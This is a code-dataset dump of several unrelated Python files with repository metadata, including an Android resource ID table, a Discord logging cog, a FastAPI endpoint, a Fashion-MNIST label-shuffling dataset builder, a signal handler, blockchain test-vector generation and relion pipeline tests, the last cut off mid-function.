'headerYearTextAppearance' : 16843928,
'yearListItemTextAppearance' : 16843929,
'yearListSelectorColor' : 16843930,
'calendarTextColor' : 16843931,
'recognitionService' : 16843932,
'timePickerStyle' : 16843933,
'timePickerDialogTheme' : 16843934,
'headerTimeTextAppearance' : 16843935,
'headerAmPmTextAppearance' : 16843936,
'numbersTextColor' : 16843937,
'numbersBackgroundColor' : 16843938,
'numbersSelectorColor' : 16843939,
'amPmTextColor' : 16843940,
'amPmBackgroundColor' : 16843941,
'searchKeyphraseRecognitionFlags' : 16843942,
'checkMarkTint' : 16843943,
'checkMarkTintMode' : 16843944,
'popupTheme' : 16843945,
'toolbarStyle' : 16843946,
'windowClipToOutline' : 16843947,
'datePickerDialogTheme' : 16843948,
'showText' : 16843949,
'windowReturnTransition' : 16843950,
'windowReenterTransition' : 16843951,
'windowSharedElementReturnTransition' : 16843952,
'windowSharedElementReenterTransition' : 16843953,
'resumeWhilePausing' : 16843954,
'datePickerMode' : 16843955,
'timePickerMode' : 16843956,
'inset' : 16843957,
'letterSpacing' : 16843958,
'fontFeatureSettings' : 16843959,
'outlineProvider' : 16843960,
'contentAgeHint' : 16843961,
'country' : 16843962,
'windowSharedElementsUseOverlay' : 16843963,
'reparent' : 16843964,
'reparentWithOverlay' : 16843965,
'ambientShadowAlpha' : 16843966,
'spotShadowAlpha' : 16843967,
'navigationIcon' : 16843968,
'navigationContentDescription' : 16843969,
'fragmentExitTransition' : 16843970,
'fragmentEnterTransition' : 16843971,
'fragmentSharedElementEnterTransition' : 16843972,
'fragmentReturnTransition' : 16843973,
'fragmentSharedElementReturnTransition' : 16843974,
'fragmentReenterTransition' : 16843975,
'fragmentAllowEnterTransitionOverlap' : 16843976,
'fragmentAllowReturnTransitionOverlap' : 16843977,
'patternPathData' : 16843978,
'strokeAlpha' : 16843979,
'fillAlpha' : 16843980,
'windowActivityTransitions' : 16843981,
'colorEdgeEffect' : 16843982
}
}
SYSTEM_RESOURCES = {
"attributes": {
"forward": {k: v for k, v in resources['attr'].items()},
"inverse": {v: k for k, v in resources['attr'].items()}
},
"styles": {
"forward": {k: v for k, v in resources['style'].items()},
"inverse": {v: k for k, v in resources['style'].items()}
}
}
| 0 | 0 | 0 |
d04cc6df4bc2c6680f882e969a37c77d253e0edb | 1,146 | py | Python | ChannelLogger.py | habu1010/gridbug-discord-bot | 81e445d7711b82574d30ccebbbddadc8adba075e | [
"MIT"
] | 1 | 2021-01-23T15:06:27.000Z | 2021-01-23T15:06:27.000Z | ChannelLogger.py | habu1010/gridbug-discord-bot | 81e445d7711b82574d30ccebbbddadc8adba075e | [
"MIT"
] | 12 | 2021-02-03T08:29:44.000Z | 2022-02-13T14:50:35.000Z | ChannelLogger.py | habu1010/gridbug-discord-bot | 81e445d7711b82574d30ccebbbddadc8adba075e | [
"MIT"
] | null | null | null | import asyncio
import logging
import logging.handlers
import discord
from discord.ext import commands, tasks
| 29.384615 | 98 | 0.685864 | import asyncio
import logging
import logging.handlers
import discord
from discord.ext import commands, tasks
class ChannelLogger(commands.Cog):
def __init__(self, bot: commands.Bot, bot_config: dict):
self._bot = bot
self._logging_queue = asyncio.Queue()
logger = logging.getLogger()
handler = logging.handlers.QueueHandler(self._logging_queue)
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
self._log_channel_id = bot_config.get("channel_id", "")
self.logger_task.start()
async def send_log(self, log: str):
channel: discord.abc.GuildChannel = self._bot.get_channel(self._log_channel_id)
await channel.send(f"```{log}```")
@tasks.loop()
async def logger_task(self) -> None:
record: logging.LogRecord = await self._logging_queue.get()
await self.send_log(record.message)
@logger_task.before_loop
async def before_logger_task(self) -> None:
await self._bot.wait_until_ready()
def setup(bot):
bot.add_cog(ChannelLogger(bot, bot.ext))
| 821 | 167 | 46 |
77127d496d0c63d976c793da0625cd048509dd2b | 383 | py | Python | text_similarity/main.py | haiderstats/text-similarity | b0a18c31ac4132f600004adf097697a61ac54eb5 | [
"CC0-1.0"
] | 4 | 2021-06-17T12:46:21.000Z | 2022-01-10T18:44:26.000Z | text_similarity/main.py | haiderstats/text-similarity | b0a18c31ac4132f600004adf097697a61ac54eb5 | [
"CC0-1.0"
] | null | null | null | text_similarity/main.py | haiderstats/text-similarity | b0a18c31ac4132f600004adf097697a61ac54eb5 | [
"CC0-1.0"
] | null | null | null | from typing import Dict
from fastapi import FastAPI, Query
from text_similarity.similarity import Texts
app = FastAPI()
@app.post("/similarity")
| 21.277778 | 76 | 0.699739 | from typing import Dict
from fastapi import FastAPI, Query
from text_similarity.similarity import Texts
app = FastAPI()
@app.post("/similarity")
def text_similarity(
texts: Texts,
ngram_limit: int = Query(
3, description="The highest ngram used for comparision.", ge=1, le=5
),
) -> Dict[str, float]:
return {"similarity": texts.similarity(ngram_limit)}
| 211 | 0 | 22 |
f2756eca852c41fc3a17a4de7a36eb1528d26c22 | 77 | py | Python | hello.py | helloprasanna/python | 1f218ddf84bc082dca5906833238389011ae344b | [
"MIT"
] | null | null | null | hello.py | helloprasanna/python | 1f218ddf84bc082dca5906833238389011ae344b | [
"MIT"
] | null | null | null | hello.py | helloprasanna/python | 1f218ddf84bc082dca5906833238389011ae344b | [
"MIT"
] | null | null | null | """Hello World for python."""
a = 3
print(a)
print(a, ' helloworld number')
| 12.833333 | 30 | 0.636364 | """Hello World for python."""
a = 3
print(a)
print(a, ' helloworld number')
| 0 | 0 | 0 |
bfaa4d5a67ed38a780d1203d6ffc677680e05f9b | 914 | py | Python | api/players/tasks.py | prattl/teamfinder-web | 85ded666879c2ee4b51cb59ffdedc2dedbfd9c7e | [
"Apache-2.0"
] | 9 | 2017-04-10T09:40:01.000Z | 2020-01-31T17:15:41.000Z | api/players/tasks.py | prattl/teamfinder-web | 85ded666879c2ee4b51cb59ffdedc2dedbfd9c7e | [
"Apache-2.0"
] | 19 | 2017-02-22T16:26:02.000Z | 2020-02-04T16:08:16.000Z | api/players/tasks.py | prattl/teamfinder-web | 85ded666879c2ee4b51cb59ffdedc2dedbfd9c7e | [
"Apache-2.0"
] | 3 | 2017-04-17T06:37:58.000Z | 2021-04-09T18:16:28.000Z | import requests
from threading import Thread
from django.db import connection
from django.utils import timezone
from .models import Player
| 21.761905 | 65 | 0.705689 | import requests
from threading import Thread
from django.db import connection
from django.utils import timezone
from .models import Player
class OPENDOTA:
PLAYERS = "https://api.opendota.com/api/players/{account_id}"
def _update_player_mmr(player_id):
try:
player = Player.objects.get(pk=player_id)
except Player.DoesNotExist:
return
steamid32 = player.user.steamid32
url = OPENDOTA.PLAYERS.format(account_id=steamid32)
response = requests.get(url)
json = response.json()
mmr = json['solo_competitive_rank']
mmr_estimate = json['mmr_estimate']['estimate']
if mmr_estimate:
player.mmr_estimate = mmr_estimate
if mmr:
player.mmr = int(mmr)
player.mmr_last_updated = timezone.now()
player.save()
connection.close()
def update_player_mmr(player_id):
Thread(target=_update_player_mmr, args=(player_id, )).start()
| 641 | 60 | 69 |
8aaba90b69e7591913e474723e3136553c765651 | 10,632 | py | Python | plugins/_Pre_Process/_Create_Dataset/create_shuffle_dataset/fashion_mnist/create_fashion_mnist_csv.py | isabella232/nnc-plugin | 3bc71266696d0341e5e9a2ff2020980700f28719 | [
"Apache-2.0"
] | 7 | 2021-09-04T13:10:07.000Z | 2022-03-21T08:51:45.000Z | plugins/_Pre_Process/_Create_Dataset/create_shuffle_dataset/fashion_mnist/create_fashion_mnist_csv.py | isabella232/nnc-plugin | 3bc71266696d0341e5e9a2ff2020980700f28719 | [
"Apache-2.0"
] | 1 | 2021-11-15T04:39:34.000Z | 2021-11-19T08:09:42.000Z | plugins/_Pre_Process/_Create_Dataset/create_shuffle_dataset/fashion_mnist/create_fashion_mnist_csv.py | isabella232/nnc-plugin | 3bc71266696d0341e5e9a2ff2020980700f28719 | [
"Apache-2.0"
] | 1 | 2022-03-25T16:52:05.000Z | 2022-03-25T16:52:05.000Z | # Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Provide data iterator for MNIST examples.
"""
import argparse
import random
import os
import numpy
import struct
import zlib
import tqdm
import numpy as np
import csv
from imageio import imwrite
from nnabla.logger import logger
from nnabla.utils.data_iterator import data_iterator
from nnabla.utils.data_source import DataSource
from nnabla.utils.data_source_loader import download
def load_mnist(train=True):
"""
Load MNIST dataset images and labels from the original page by Yan LeCun or the cache file.
Args:
train (bool): The testing dataset will be returned if False. Training data has 60000 images, while testing has 10000 images.
Returns:
numpy.ndarray: A shape of (#images, 1, 28, 28). Values in [0.0, 1.0].
numpy.ndarray: A shape of (#images, 1). Values in {0, 1, ..., 9}.
"""
if train:
image_uri = "https://github.com/zalandoresearch/fashion-mnist/train-images-idx3-ubyte.gz"
label_uri = "https://github.com/zalandoresearch/fashion-mnist/train-labels-idx1-ubyte.gz"
else:
image_uri = (
"https://github.com/zalandoresearch/fashion-mnist/t10k-images-idx3-ubyte.gz"
)
label_uri = (
"https://github.com/zalandoresearch/fashion-mnist/t10k-labels-idx1-ubyte.gz"
)
logger.info("Getting label data from {}.".format(label_uri))
# With python3 we can write this logic as following, but with
# python2, gzip.object does not support file-like object and
# urllib.request does not support 'with statement'.
#
# with request.urlopen(label_uri) as r, gzip.open(r) as f:
# _, size = struct.unpack('>II', f.read(8))
# labels = numpy.frombuffer(f.read(), numpy.uint8).reshape(-1, 1)
#
r = download(label_uri)
data = zlib.decompress(r.read(), zlib.MAX_WBITS | 32)
_, size = struct.unpack(">II", data[0:8])
labels = numpy.frombuffer(data[8:], numpy.uint8).reshape(-1, 1)
r.close()
logger.info("Getting label data done.")
logger.info("Getting image data from {}.".format(image_uri))
r = download(image_uri)
data = zlib.decompress(r.read(), zlib.MAX_WBITS | 32)
_, size, height, width = struct.unpack(">IIII", data[0:16])
images = numpy.frombuffer(data[16:], numpy.uint8).reshape(
size, 1, height, width)
r.close()
logger.info("Getting image data done.")
return images, labels
class FashionMnistDataSource(DataSource):
"""
Get data directly from MNIST dataset from Internet(yann.lecun.com).
"""
@property
def images(self):
"""Get copy of whole data with a shape of (N, 1, H, W)."""
return self._images.copy()
@property
def labels(self):
"""Get copy of whole label with a shape of (N, 1)."""
return self._labels.copy()
@property
def data_iterator_fashion_mnist(
batch_size,
train=True,
rng=None,
shuffle=True,
with_memory_cache=False,
with_file_cache=False,
label_shuffle=False,
label_shuffle_rate=0.1,
):
"""
Provide DataIterator with :py:class:`FashionMnistDataSource`
with_memory_cache and with_file_cache option's default value is all False,
because :py:class:`FashionMnistDataSource` is able to store all data into memory.
For example,
.. code-block:: python
with data_iterator_mnist(True, batch_size) as di:
for data in di:
SOME CODE TO USE data.
"""
return data_iterator(
FashionMnistDataSource(
train=train,
shuffle=shuffle,
rng=rng,
label_shuffle=label_shuffle,
label_shuffle_rate=label_shuffle_rate,
),
batch_size,
rng,
with_memory_cache,
with_file_cache,
)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--label_shuffle", action="store_true", help="generate label shuffled dataset"
)
parser.add_argument("--seed", type=int, default=0)
parser.add_argument("--shuffle_rate", type=float, default=0.1)
args = parser.parse_args()
set_seed()
print("Label Shuffle: ", args.label_shuffle)
main()
| 32.316109 | 132 | 0.605813 | # Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Provide data iterator for MNIST examples.
"""
import argparse
import random
import os
import numpy
import struct
import zlib
import tqdm
import numpy as np
import csv
from imageio import imwrite
from nnabla.logger import logger
from nnabla.utils.data_iterator import data_iterator
from nnabla.utils.data_source import DataSource
from nnabla.utils.data_source_loader import download
def set_seed():
random.seed(args.seed)
np.random.seed(args.seed)
def load_mnist(train=True):
"""
Load MNIST dataset images and labels from the original page by Yan LeCun or the cache file.
Args:
train (bool): The testing dataset will be returned if False. Training data has 60000 images, while testing has 10000 images.
Returns:
numpy.ndarray: A shape of (#images, 1, 28, 28). Values in [0.0, 1.0].
numpy.ndarray: A shape of (#images, 1). Values in {0, 1, ..., 9}.
"""
if train:
image_uri = "https://github.com/zalandoresearch/fashion-mnist/train-images-idx3-ubyte.gz"
label_uri = "https://github.com/zalandoresearch/fashion-mnist/train-labels-idx1-ubyte.gz"
else:
image_uri = (
"https://github.com/zalandoresearch/fashion-mnist/t10k-images-idx3-ubyte.gz"
)
label_uri = (
"https://github.com/zalandoresearch/fashion-mnist/t10k-labels-idx1-ubyte.gz"
)
logger.info("Getting label data from {}.".format(label_uri))
# With python3 we can write this logic as following, but with
# python2, gzip.object does not support file-like object and
# urllib.request does not support 'with statement'.
#
# with request.urlopen(label_uri) as r, gzip.open(r) as f:
# _, size = struct.unpack('>II', f.read(8))
# labels = numpy.frombuffer(f.read(), numpy.uint8).reshape(-1, 1)
#
r = download(label_uri)
data = zlib.decompress(r.read(), zlib.MAX_WBITS | 32)
_, size = struct.unpack(">II", data[0:8])
labels = numpy.frombuffer(data[8:], numpy.uint8).reshape(-1, 1)
r.close()
logger.info("Getting label data done.")
logger.info("Getting image data from {}.".format(image_uri))
r = download(image_uri)
data = zlib.decompress(r.read(), zlib.MAX_WBITS | 32)
_, size, height, width = struct.unpack(">IIII", data[0:16])
images = numpy.frombuffer(data[16:], numpy.uint8).reshape(
size, 1, height, width)
r.close()
logger.info("Getting image data done.")
return images, labels
class FashionMnistDataSource(DataSource):
"""
Get data directly from MNIST dataset from Internet(yann.lecun.com).
"""
def _get_data(self, position):
image = self._images[self._indexes[position]]
label = self._labels[self._indexes[position]]
if args.label_shuffle and self._train:
shuffle = self._shuffle_label[self._indexes[position]]
return (image, label, shuffle)
else:
return (image, label)
def __init__(
self,
train=True,
shuffle=False,
rng=None,
label_shuffle=False,
label_shuffle_rate=0.1,
):
super(FashionMnistDataSource, self).__init__(shuffle=shuffle)
self._train = train
self._images, self._labels = load_mnist(train)
if label_shuffle:
raw_label = self._labels.copy()
self.shuffle_rate = label_shuffle_rate
self._shuffle_label = self.label_shuffle()
print(f"{self.shuffle_rate*100}% of data was shuffled ")
print(
"shuffle_label_number: ", len(
np.where(self._labels != self._shuffle_label)[0]),
)
self._size = self._labels.size
if args.label_shuffle and train:
self._variables = ("x", "y", "shuffle")
else:
self._variables = ("x", "y")
if rng is None:
rng = numpy.random.RandomState(313)
self.rng = rng
self.reset()
def label_shuffle(self):
num_cls = int(np.max(self._labels)) + 1
shuffle_label = self._labels.copy()
extract_num = int(len(self._labels) * self.shuffle_rate // num_cls)
for i in range(num_cls):
extract_ind = np.where(self._labels == i)[0]
labels = [j for j in range(num_cls)]
labels.remove(i) # candidate of shuffle label
artificial_label = [
labels[int(i) % (num_cls - 1)] for i in range(int(extract_num))
]
artificial_label = np.array(
random.sample(artificial_label, len(artificial_label))
).astype("float32")
convert_label = np.array([i for _ in range(len(extract_ind))])
convert_label[-extract_num:] = artificial_label
random.shuffle(convert_label)
shuffle_label[extract_ind] = convert_label.reshape(-1, 1)
return shuffle_label
def reset(self):
if self._shuffle:
self._indexes = self.rng.permutation(self._size)
else:
self._indexes = numpy.arange(self._size)
super(FashionMnistDataSource, self).reset()
@property
def images(self):
"""Get copy of whole data with a shape of (N, 1, H, W)."""
return self._images.copy()
@property
def labels(self):
"""Get copy of whole label with a shape of (N, 1)."""
return self._labels.copy()
@property
def shuffle_labels(self):
return self._shuffle_label.copy()
def data_iterator_fashion_mnist(
batch_size,
train=True,
rng=None,
shuffle=True,
with_memory_cache=False,
with_file_cache=False,
label_shuffle=False,
label_shuffle_rate=0.1,
):
"""
Provide DataIterator with :py:class:`FashionMnistDataSource`
with_memory_cache and with_file_cache option's default value is all False,
because :py:class:`FashionMnistDataSource` is able to store all data into memory.
For example,
.. code-block:: python
with data_iterator_mnist(True, batch_size) as di:
for data in di:
SOME CODE TO USE data.
"""
return data_iterator(
FashionMnistDataSource(
train=train,
shuffle=shuffle,
rng=rng,
label_shuffle=label_shuffle,
label_shuffle_rate=label_shuffle_rate,
),
batch_size,
rng,
with_memory_cache,
with_file_cache,
)
def data_iterator_to_csv(csv_path, csv_file_name, data_path, data_iterator, shuffle):
index = 0
csv_data = []
labels = [
"T-shirt/top",
"Trouser",
"Pullover",
"Dress",
"Coat",
"Sandal",
"Shirt",
"Sneaker",
"Bag",
"Ankle_boot",
]
with data_iterator as data:
if shuffle:
line = ["x:image", "y:label;" + ";".join(labels), "original_label"]
else:
line = ["x:image", "y:label;" + ";".join(labels)]
csv_data.append(line)
pbar = tqdm.tqdm(total=data.size, unit="images")
initial_epoch = data.epoch
while data.epoch == initial_epoch:
d = data.next()
for i in range(len(d[0])):
label = d[1][i][0]
file_name = (
data_path +
"/{}".format(labels[label]) + "/{}.png".format(index)
)
full_path = os.path.join(
csv_path, file_name.replace("/", os.path.sep))
directory = os.path.dirname(full_path)
if not os.path.exists(directory):
os.makedirs(directory)
imwrite(full_path, d[0][i].reshape(28, 28))
if shuffle:
shuffled_label = d[2][i][0]
csv_data.append([file_name, shuffled_label, label])
else:
csv_data.append([file_name, label])
index += 1
pbar.update(1)
pbar.close()
with open(os.path.join(csv_path, csv_file_name), "w") as f:
writer = csv.writer(f, lineterminator="\n")
writer.writerows(csv_data)
return csv_data
def main():
path = os.path.abspath(os.path.dirname(__file__))
# Create original training set
logger.log(99, "Downloading Fashion MNIST dataset...")
train_di = data_iterator_fashion_mnist(
60000,
True,
None,
False,
label_shuffle=args.label_shuffle,
label_shuffle_rate=args.shuffle_rate,
)
if args.label_shuffle:
logger.log(99, 'Creating "fashion_mnist_training_shuffle.csv"... ')
train_csv = data_iterator_to_csv(
path,
"fashion_mnist_training_shuffle.csv",
os.path.join(os.getcwd(), "training"),
train_di,
shuffle=args.label_shuffle,
)
else:
logger.log(99, 'Creating "fashion_mnist_training.csv"... ')
train_csv = data_iterator_to_csv(
path,
"fashion_mnist_training.csv",
os.path.join(os.getcwd(), "training"),
train_di,
shuffle=False,
)
# Create original test set
validation_di = data_iterator_fashion_mnist(10000, False, None, False)
logger.log(99, 'Creating "fashion_mnist_test.csv"... ')
test_csv = data_iterator_to_csv(
path,
"fashion_mnist_test.csv",
os.path.join(os.getcwd(), "validation"),
validation_di,
shuffle=False,
)
logger.log(99, "Dataset creation completed successfully.")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--label_shuffle", action="store_true", help="generate label shuffled dataset"
)
parser.add_argument("--seed", type=int, default=0)
parser.add_argument("--shuffle_rate", type=float, default=0.1)
args = parser.parse_args()
set_seed()
print("Label Shuffle: ", args.label_shuffle)
main()
| 5,631 | 0 | 203 |
96264eefbcc71d8bbbe887923f0da92571272ddf | 1,640 | py | Python | dino/utils/handlers.py | thenetcircle/dino | 1047c3458e91a1b4189e9f48f1393b3a68a935b3 | [
"Apache-2.0"
] | 150 | 2016-10-05T11:09:36.000Z | 2022-03-06T16:24:41.000Z | dino/utils/handlers.py | thenetcircle/dino | 1047c3458e91a1b4189e9f48f1393b3a68a935b3 | [
"Apache-2.0"
] | 27 | 2017-03-02T03:37:02.000Z | 2022-02-10T04:59:54.000Z | dino/utils/handlers.py | thenetcircle/dino | 1047c3458e91a1b4189e9f48f1393b3a68a935b3 | [
"Apache-2.0"
] | 21 | 2016-11-11T07:51:48.000Z | 2020-04-26T21:38:33.000Z | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import signal
__author__ = 'Oscar Eriksson <oscar.eriks@gmail.com>'
| 27.79661 | 74 | 0.646951 | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import signal
__author__ = 'Oscar Eriksson <oscar.eriks@gmail.com>'
class GracefulInterruptHandler(object):
def __init__(self, sig=signal.SIGINT):
self.sig = sig
self.interrupted = False
self.released = False
self.original_handler = None
def __enter__(self):
self.interrupted = False
self.released = False
self.original_handler = signal.getsignal(self.sig)
def handler(signum, frame):
self.release()
self.interrupted = True
try:
signal.signal(self.sig, handler)
except ValueError:
# when testing we can't use signal, just ignore
pass
return self
def __exit__(self, type, value, tb):
self.release()
def release(self):
if self.released:
return False
try:
signal.signal(self.sig, self.original_handler)
except ValueError:
# when testing we can't use signal, just ignore
pass
self.released = True
return True
| 858 | 18 | 130 |
d36b0c4d3e977cd2d94ae76b9ab736a7585a4e6b | 1,408 | py | Python | e2e/Vectors/Generation/Consensus/MeritRemoval/Multiple.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 66 | 2019-01-14T08:39:52.000Z | 2022-01-06T11:39:15.000Z | e2e/Vectors/Generation/Consensus/MeritRemoval/Multiple.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 228 | 2019-01-16T15:42:44.000Z | 2022-02-05T07:48:07.000Z | e2e/Vectors/Generation/Consensus/MeritRemoval/Multiple.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 19 | 2019-01-14T08:53:04.000Z | 2021-11-03T20:19:28.000Z | import json
from e2e.Libs.BLS import PrivateKey, PublicKey
from e2e.Classes.Consensus.DataDifficulty import SignedDataDifficulty
from e2e.Classes.Consensus.MeritRemoval import SignedMeritRemoval
from e2e.Vectors.Generation.PrototypeChain import PrototypeChain
proto: PrototypeChain = PrototypeChain(1, False)
blsPrivKey: PrivateKey = PrivateKey(0)
blsPubKey: PublicKey = blsPrivKey.toPublicKey()
#Create a DataDifficulty.
dataDiff: SignedDataDifficulty = SignedDataDifficulty(3, 0)
dataDiff.sign(0, blsPrivKey)
#Create a conflicting DataDifficulty with the same nonce.
dataDiffConflicting: SignedDataDifficulty = SignedDataDifficulty(1, 0)
dataDiffConflicting.sign(0, blsPrivKey)
#Create a MeritRemoval out of the two of them.
mr1: SignedMeritRemoval = SignedMeritRemoval(dataDiff, dataDiffConflicting)
proto.add(elements=[dataDiff, dataDiffConflicting])
#Create two more DataDifficulties with a different nonce.
dataDiff = SignedDataDifficulty(3, 1)
dataDiff.sign(0, blsPrivKey)
dataDiffConflicting = SignedDataDifficulty(1, 1)
dataDiffConflicting.sign(0, blsPrivKey)
#Create another MeritRemoval out of these two.
mr2: SignedMeritRemoval = SignedMeritRemoval(dataDiff, dataDiffConflicting)
with open("e2e/Vectors/Consensus/MeritRemoval/Multiple.json", "w") as vectors:
vectors.write(json.dumps({
"blockchain": proto.toJSON(),
"removals": [mr1.toSignedJSON(), mr2.toSignedJSON()]
}))
| 34.341463 | 78 | 0.810369 | import json
from e2e.Libs.BLS import PrivateKey, PublicKey
from e2e.Classes.Consensus.DataDifficulty import SignedDataDifficulty
from e2e.Classes.Consensus.MeritRemoval import SignedMeritRemoval
from e2e.Vectors.Generation.PrototypeChain import PrototypeChain
proto: PrototypeChain = PrototypeChain(1, False)
blsPrivKey: PrivateKey = PrivateKey(0)
blsPubKey: PublicKey = blsPrivKey.toPublicKey()
#Create a DataDifficulty.
dataDiff: SignedDataDifficulty = SignedDataDifficulty(3, 0)
dataDiff.sign(0, blsPrivKey)
#Create a conflicting DataDifficulty with the same nonce.
dataDiffConflicting: SignedDataDifficulty = SignedDataDifficulty(1, 0)
dataDiffConflicting.sign(0, blsPrivKey)
#Create a MeritRemoval out of the two of them.
mr1: SignedMeritRemoval = SignedMeritRemoval(dataDiff, dataDiffConflicting)
proto.add(elements=[dataDiff, dataDiffConflicting])
#Create two more DataDifficulties with a different nonce.
dataDiff = SignedDataDifficulty(3, 1)
dataDiff.sign(0, blsPrivKey)
dataDiffConflicting = SignedDataDifficulty(1, 1)
dataDiffConflicting.sign(0, blsPrivKey)
#Create another MeritRemoval out of these two.
mr2: SignedMeritRemoval = SignedMeritRemoval(dataDiff, dataDiffConflicting)
with open("e2e/Vectors/Consensus/MeritRemoval/Multiple.json", "w") as vectors:
vectors.write(json.dumps({
"blockchain": proto.toJSON(),
"removals": [mr1.toSignedJSON(), mr2.toSignedJSON()]
}))
| 0 | 0 | 0 |
1ba7c7976cfc6994b6bba52a66714b7218cb51cb | 5,451 | py | Python | tests/parser/test_relion_pipeline.py | DiamondLightSource/python-relion | 8ff1f87510f1a8971a5fd8d217eb17cbea78731d | [
"BSD-3-Clause"
] | 5 | 2020-07-20T04:18:25.000Z | 2022-02-12T13:40:48.000Z | tests/parser/test_relion_pipeline.py | DiamondLightSource/python-relion | 8ff1f87510f1a8971a5fd8d217eb17cbea78731d | [
"BSD-3-Clause"
] | 97 | 2020-07-17T18:20:06.000Z | 2022-03-31T10:28:47.000Z | tests/parser/test_relion_pipeline.py | DiamondLightSource/python-relion | 8ff1f87510f1a8971a5fd8d217eb17cbea78731d | [
"BSD-3-Clause"
] | 1 | 2020-10-30T11:07:03.000Z | 2020-10-30T11:07:03.000Z | import pathlib
import sys
import pytest
from relion._parser.processgraph import ProcessGraph
from relion._parser.processnode import ProcessNode
from relion._parser.relion_pipeline import RelionPipeline
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.mark.skipif(sys.platform == "win32", reason="does not run on windows")
| 33.857143 | 88 | 0.737663 | import pathlib
import sys
import pytest
from relion._parser.processgraph import ProcessGraph
from relion._parser.processnode import ProcessNode
from relion._parser.relion_pipeline import RelionPipeline
@pytest.fixture
def next_node_01():
return ProcessNode("MotionCorr/job002")
@pytest.fixture
def next_node_02():
return ProcessNode("CtfFind/job003")
@pytest.fixture
def node_with_links(next_node_01, next_node_02):
node = ProcessNode("Import/job001")
node.link_to(next_node_01)
node.link_to(next_node_02)
return node
@pytest.fixture
def graph(node_with_links, next_node_01, next_node_02):
node_links = [node_with_links, next_node_01, next_node_02]
return ProcessGraph("process graph", node_links)
@pytest.fixture
def pipeline(graph):
rpipeline = RelionPipeline("Import/job001", graph)
rpipeline._job_nodes = rpipeline._nodes
return rpipeline
def test_relion_pipeline_iterator_with_preprepared_pipeline(
pipeline, node_with_links, next_node_01, next_node_02
):
assert list(pipeline) == ["Import", "MotionCorr", "CtfFind"]
def test_relion_pipeline_load_files_from_star(dials_data):
pipeline = RelionPipeline("Import/job001")
pipeline.load_nodes_from_star(
dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
)
assert "Extract/job018" in pipeline._nodes
assert "Class2D/job008/run_it025_model.star" in pipeline._nodes
assert "Extract/job018" in pipeline._job_nodes
assert "Class2D/job008/run_it025_model.star" not in pipeline._job_nodes
def test_relion_pipeline_check_job_node_statuses(dials_data):
pipeline = RelionPipeline("Import/job001")
pipeline.load_nodes_from_star(
dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
)
pipeline.check_job_node_statuses(
pathlib.Path(dials_data("relion_tutorial_data", pathlib=True))
)
assert pipeline._job_nodes[pipeline._job_nodes.index("Extract/job018")].environment[
"status"
]
assert pipeline._job_nodes[pipeline._job_nodes.index("Class2D/job008")].environment[
"status"
]
def test_relion_pipeline_current_jobs_property_without_any_start_time_information(
dials_data,
):
pipeline = RelionPipeline("Import/job001")
pipeline.load_nodes_from_star(
dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
)
pipeline.check_job_node_statuses(dials_data("relion_tutorial_data", pathlib=True))
assert pipeline.current_jobs is None
def test_relion_pipeline_collect_job_times_from_dials_data_logs(dials_data):
pipeline = RelionPipeline("Import/job001")
pipeline.load_nodes_from_star(
dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
)
logs = list(dials_data("relion_tutorial_data", pathlib=True).glob("pipeline*.log"))
assert (
dials_data("relion_tutorial_data", pathlib=True) / "pipeline_PREPROCESS.log"
in logs
)
pipeline.collect_job_times(logs)
for job in pipeline._job_nodes:
assert job.environment["start_time_stamp"] is not None
assert (
pipeline._job_nodes[pipeline._job_nodes.index("MotionCorr/job002")].environment[
"job_count"
]
== 2
)
assert (
pipeline._job_nodes[pipeline._job_nodes.index("Class2D/job008")].environment[
"job_count"
]
== 1
)
def test_relion_pipeline_current_jobs_property_with_timing_info(dials_data):
pipeline = RelionPipeline("Import/job001")
pipeline.load_nodes_from_star(
dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
)
logs = list(dials_data("relion_tutorial_data", pathlib=True).glob("pipeline*.log"))
pipeline.collect_job_times(logs)
pipeline.check_job_node_statuses(
pathlib.Path(dials_data("relion_tutorial_data", pathlib=True))
)
pipeline._job_nodes[pipeline._job_nodes.index("LocalRes/job031")].environment[
"status"
] = None
